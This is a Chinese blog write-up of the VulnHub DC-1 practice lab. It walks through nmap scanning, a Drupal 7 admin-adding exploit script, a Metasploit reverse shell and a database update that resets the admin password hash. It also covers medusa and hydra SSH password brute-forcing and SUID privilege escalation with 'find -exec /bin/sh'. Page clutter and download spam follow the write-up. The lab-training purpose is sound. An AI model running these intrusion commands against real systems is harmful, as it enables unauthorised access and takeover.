DC-1知识点通关

已于 2024-04-08 15:20:19 修改
阅读量1k 收藏 24
点赞数 12
文章标签: DC-1 靶机通关
于 2024-04-08 15:19:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80661529/article/details/137473866
版权

知识点总结

1.nmap扫描(端口、内核版本)

2.burp爆破密码

3.目录扫描

4.遍历目录

5.查看CMS,并利用历史漏洞

6.msf利用历史漏洞,反弹shell

7.内核提权

8.查看配置文件

9.更改数据库密码

10.medusa/hydra 爆破

11.suid提权

kali相关ssh密码爆破字典:/usr/share/john/password.lst

1.nmap扫描

nmap -A -p- 192.168.0.130

80、22、111、49414端口,大概内核版本

2.访问端口

访问80端口,要求登录

注意:千万别爆破,访问过多会被封IP,下述就是血的教训

猜测admin用户名,并尝试爆破,但是经过爆破发现有错误次数限制

IP被封!换方法,发现注册新用户,邮箱并没有收到密码的设置信息

3.目录扫描

都访问了个遍,结果发现Access denied,无权限!

4.发现使用了Drupal 7(CMS)

 1.exploitdb使用

查找现成的payload

找到了一个添加管理员的一个payload.

把它拷问到我们当前目录

查看如何使用,创建用户abc/123456,因为之前IP被封了,我重新搭建了靶机IP也就改了

python2 34992.py -t http://192.168.0.131 -u abc -p 12345

试图执行PHP代码,失败

不行,看看ssh端口,也登录失败了

看看别的payload

但是在执行的时候,发现无法执行

2.msf调用payload反弹shell

利用msf试试,关于payload的选择我们就选,时间新一点的,并且rank为excellent的

等待连接,然后shell即可,python交互性shell:

python -c 'import pty;pty.spawn("/bin/bash")'

6.尝试内核提权(失败)

确认wget指令可用,试试内核提权

直接百度一下

直接下载到/var/www/html即可

然后开启apache服务

gcc 40839.c 
chmod 777 40839.c
./40839.c

失败了

发现网站根目录下的flag1.txt,提示查看CMS的配置文件

7.查看配置文件

发现了

8.查看到数据库登录

mysql -udbuser -p

这个哈希解密,解不了,我们只好修改密码了

发现了加密算法文件,password-hash.sh

9.更新密码

update users set pass = '$S$DRX6M.nvrKxrvQvj4kef1/pbQR0FzL1paS4sStmNxlFhADzUxvRe' where name = 'admin';

10.登录后台

发现flag3

 提示要我们使用find指令,perms

然后常规到家目录下看看 /home

找到flag4

使用同样方法找到root下的flag

同时我们还可以使用爆破来获取flag4

首先查看/etc/passwd

11.medusa/hydra 爆破ssh

使用medusa爆破一下ssh密码

medusa -M ssh -h 192.168.0.131 -u flag4 -P /usr/share/john/password.lst -e ns -F

或者

echo 'flag4'>admin.txt
hydra -L admin.txt -P /usr/share/john/password.lst 192.168.0.131 ssh

爆破成功!密码:orange

12.suid提权

根据flag3提示的,我们使用suid提权

suid是一中执行权限,我们对有可执行的二进制文件或者命令就可以赋予suid权限,当我们执行该二进制命令或文件,会以赋予该文件或命令suid权限的属主执行,而并非当前执行的用户。注:linux的所有物都是以文件的形式存在,相关的命令其实也是指向某个文件。

chmod u+s filename   设置SUID位
chmod u-s filename   去掉SUID设置

现在已知的具有SUID权限的二进制可执行文件大体有如下这些

nmap
vim
find
bash
more
less
nano
cp
awk

以下命令可以找到正在系统上运行的所有SUID可执行文件。准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

可以根据find的相关suid提权,进行提权

参考推文:简谈SUID提权 - FreeBuf网络安全行业门户

find提权其一

find -exec /bin/sh \;

成功提权!

最后拿到finalflag!

Yf3_te
关注
  • 12
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-DC PCB layout 指导.docx
06-18
1. Bad layout 会导致 EMI 干扰,降低 DC-DC 的性能。因此,需要尽量减少 layout 的噪声和干扰。 2. 开关大电流回路尽量短信号地和大电流(功率地)单独走线,并在芯片 GND 处单点连接。这样可以减少噪声和干扰,...
DC-DC变换器Simulink仿真模型
08-07
具体到这个名为"DC_DC_PWM-RECTIFIER1.mdl"的Simulink模型,我们可以推断它是包含脉宽调制(PWM)和整流器功能的DC-DC变换器。PWM技术用于控制开关器件的导通时间,从而改变输出电压的平均值。而整流器则将交流信号...
DC-9 vulnhub靶场详细通关记录
weixin_62621015的博客
03-03 346
vulnhub靶场 DC-9个人通关记录 补充了很多细节和知识点,可以参考一下
vulnhub通关-1 DC-1(含靶场资源)
Brucye
01-20 1149
msfconsole 进入MSF控制台search 搜索相应模块use 对应模块show options 查看信息 set RHOST 远程主机iprun 攻击。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 8031
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-1靶场通关详解
qq_30889301的博客
05-20 177
dc-1入门教程
dc-sdk-examples:DC-SDK开发示例
05-11
"DC-SDK开发示例"是一个专门为开发者设计的项目,旨在帮助他们更好地理解和使用DC-SDK进行3D可视化开发。DC-SDK(可能是"Data Center SDK"或类似的缩写)是一个强大的工具集,用于构建基于Web的三维场景,特别是在...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
[高分项目]基于vue,springboot的图书馆管理系统[源码+笔记+操作手册+说明文档].zip
07-25
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源
b197企业项目管理系统-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
最新发布
07-25
企业项目管理系统按照操作主体分为管理员和用户。管理员的功能包括操作日志管理、字典管理、论坛管理、公告管理、项目管理、项目申报管理、用户管理、管理员管理。用户的功能等。该系统采用了Mysql数据库,Java语言,Spring Boot框架等技术进行编程实现。 企业项目管理系统可以提高企业项目管理系统信息管理问题的解决效率,优化企业项目管理系统信息处理流程,保证企业项目管理系统信息数据的安全,它是一个非常可靠,非常安全的应用程序。 管理员权限操作的功能包括管理公告,管理企业项目管理系统信息,包括项目管理,培训管理,项目申报管理,薪资管理等,可以管理公告。 项目管理界面,管理员在项目管理界面中可以对界面中显示,可以对项目信息的项目状态进行查看,可以添加新的项目信息等。项目申报管理界面,管理员在项目申报管理界面中查看项目申报种类信息,项目申报描述信息,新增项目申报信息等。公告管理界面,管理员在公告管理界面中新增公告,可以删除公告。公告类型管理界面,管理员在公告类型管理界面查看公告的工作状态,可以对公告的数据进行导出,可以添加新公告的信息,可以编辑公告信息,删除公告信息
Docker容器化缓存服务:Redis的极速之旅
07-25
Docker是一个开源的应用容器引擎,它允许开发者打包他们的应用以及应用的运行环境到一个可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口(类似iPhone的app),更重要的是容器性能开销极低。 ### Docker的主要特点包括: 1. **容器化**:Docker可以将应用及其依赖打包在轻量级、可移植的容器中,而不是传统的虚拟机。 2. **可移植性**:由于容器与底层基础设施无关,因此可以在任何安装了Docker的主机上运行。 3. **自动化部署**:Docker可以通过Dockerfile自动化构建容器镜像,简化部署流程。 4. **版本控制和组件重用**:Docker Hub和其他注册中心可以存储容器镜像,支持版本控制和重用。 5. **微服务架构**:Docker非常适合微服务架构,每个服务可以独立打包、部署和扩展。 6. **弹性伸缩**:容器可以快速启动和停止,适合实现应用的弹性伸缩。 7. **安全性**:容器提供了额外的隔离层,有助于提高应用的安全性。 8. **多租户架构**
《AI大模型应用》--Golang版本国内大模型API调用,集成文心一言、通义千问、讯飞星火、智谱AI.zip
07-25
个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸!
M0G3507软件模拟IIC
07-25
M0G3507软件模拟IIC
Codeforces Round 961 (Div. 2) 编程竞赛的详细解析
07-25
codeforces round 961 (div. 2)
Matlab实现侏儒猫鼬优化算法DMO-TCN-Multihead-Attention多输入单输出回归预测算法研究.rar
07-25
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
拼多多java开发面试题
07-25
拼多多 Java 开发面试题 拼多多作为中国领先的电商平台之一,对Java开发工程师有着严格的要求。本文将汇总一些常见的拼多多Java开发面试题,帮助您更好地准备面试。这些问题涵盖Java基础知识、面向对象编程、并发编程、数据库、Spring框架、分布式系统等多个方面。
DC-DC转换器工作原理及模式解析
这些基础知识对于初学者理解DC-DC转换器的运作机制和进行相关开发设计具有重要指导意义。 DC/DC转换器是电力电子领域中的一种重要设备,主要用于改变直流电压的大小,以适应不同负载或系统的需要。其工作原理基于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值